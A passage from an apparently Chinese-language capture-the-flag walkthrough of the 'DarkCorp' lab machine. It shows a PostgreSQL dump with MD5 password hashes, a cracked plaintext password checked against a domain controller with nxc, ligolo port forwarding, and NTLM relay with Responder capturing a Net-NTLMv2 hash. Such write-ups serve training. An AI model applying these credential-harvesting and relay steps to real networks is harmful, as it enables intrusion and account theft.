id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80)
);
ALTER TABLE public."Admins" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Admins_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Admins_id_seq" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Admins_id_seq" OWNED BY public."Admins".id;
--
-- Name: Users; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Users" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80),
host_header character varying(255),
ip_address character varying(80)
);
ALTER TABLE public."Users" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Users_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Users_id_seq" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Users_id_seq" OWNED BY public."Users".id;
--
-- Name: Admins id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins" ALTER COLUMN id SET DEFAULT nextval('public."Admins_id_seq"'::regclass);
--
-- Name: Users id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users" ALTER COLUMN id SET DEFAULT nextval('public."Users_id_seq"'::regclass);
--
-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Admins" (id, username, password, email) FROM stdin;
>>>> 1 bcase dc5484871bc95c4eab58032884be7225 bcase@drip.htb
>>>> 2 victor.r cac1c7b0e7008d67b6db40c03e76b9c0 victor.r@drip.htb
>>>> 3 ebelford 8bbd7f88841b4223ae63c8848969be86 ebelford@drip.htb
\.
--
-- Data for Name: Users; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Users" (id, username, password, email, host_header, ip_address) FROM stdin;
5001 support d9b9ecbf29db8054b21f303072b37c4e support@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5002 bcase 1eace53df87b9a15a37fdc11da2d298d bcase@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5003 ebelford 0cebd84e066fd988e89083879e88c5f9 ebelford@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
\.
--
-- Name: Admins_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Admins_id_seq"', 1, true);
--
-- Name: Users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Users_id_seq"', 5003, true);
--
-- Name: Admins Admins_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins"
ADD CONSTRAINT "Admins_pkey" PRIMARY KEY (id);
--
-- Name: Users Users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users"
ADD CONSTRAINT "Users_pkey" PRIMARY KEY (id);
--
-- Name: TABLE "Admins"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Admins" TO dripmail_dba;
--
-- Name: SEQUENCE "Admins_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Admins_id_seq" TO dripmail_dba;
--
-- Name: TABLE "Users"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Users" TO dripmail_dba;
--
-- Name: SEQUENCE "Users_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Users_id_seq" TO dripmail_dba;
--
-- PostgreSQL database dump complete
--postgres@drip:/var/backups/postgres$
可以获取到三个md5
dc5484871bc95c4eab58032884be7225
cac1c7b0e7008d67b6db40c03e76b9c0
8bbd7f88841b4223ae63c8848969be86
可以获取到victor.r@drip.htb的密码 victor1gustavo@#
1.5. Internal Status Monitor
使用此密码可以登录到Internal Status Monitor
这是一个内网主机状态监测网站
看到这个很容易就想到可以进行NTLMRelay ,之前肯定是遇到过的类似的,但我现在想不起来了
此外此凭据也可以登录到域内
┌──(root㉿kali)-[/usr/share/responder]
└─# nxc smb 172.16.20.1 -u victor.r -p victor1gustavo@#
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
1.5.1. ntlm relay
先配置一下burp认证
然后抓个包看看
使用ligolo转发端口
[Agent : ebelford@drip] » listener_add --tcp --addr 0.0.0.0:8080 --to 10.10.14.86:80
INFO[0085] Listener 0 created on remote agent!
可以nc测试一下
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.14.86] 54606
GET / HTTP/1.1
Host: drip.darkcorp.htb:8080
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
没问题的
使用Responder捕获Net-NTLMv2 哈希
这里由于我的responder有问题,没法获取到此Net-NTLMv2哈希
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.11.54
[HTTP] NTLMv2 Username : darkcorp\svc_acc
[HTTP] NTLMv2 Hash : svc_acc::darkcorp:ffdb62442934ec99:63F597E3C5D438360354CF490724F368:01010000000000008CE06A82563DDC01DABD37CC5F38A9F30000000002000800370048004100310001001E00570049004E002D00440054005500410034004400570032005800490044000400140037004800410031002E004C004F00430041004C0003003400570049004E002D00440054005500410034004400570032005800490044002E0037004800410031002E004C004F00430041004C000500140037004800410031002E004C004F00430041004C00080030003000000000000000000000000030000031EC7482A518E93073DC620355271849187E5AAAD9F26F57289D7D78892794DE0A0010000000000000000000000000000000000009002C0048005400540050002F0064007200690070002E006400610072006B0063006F00720070002E006800740062000000000000000000
如果顺利的话,可以获取到一个这样的hash,但是无法crack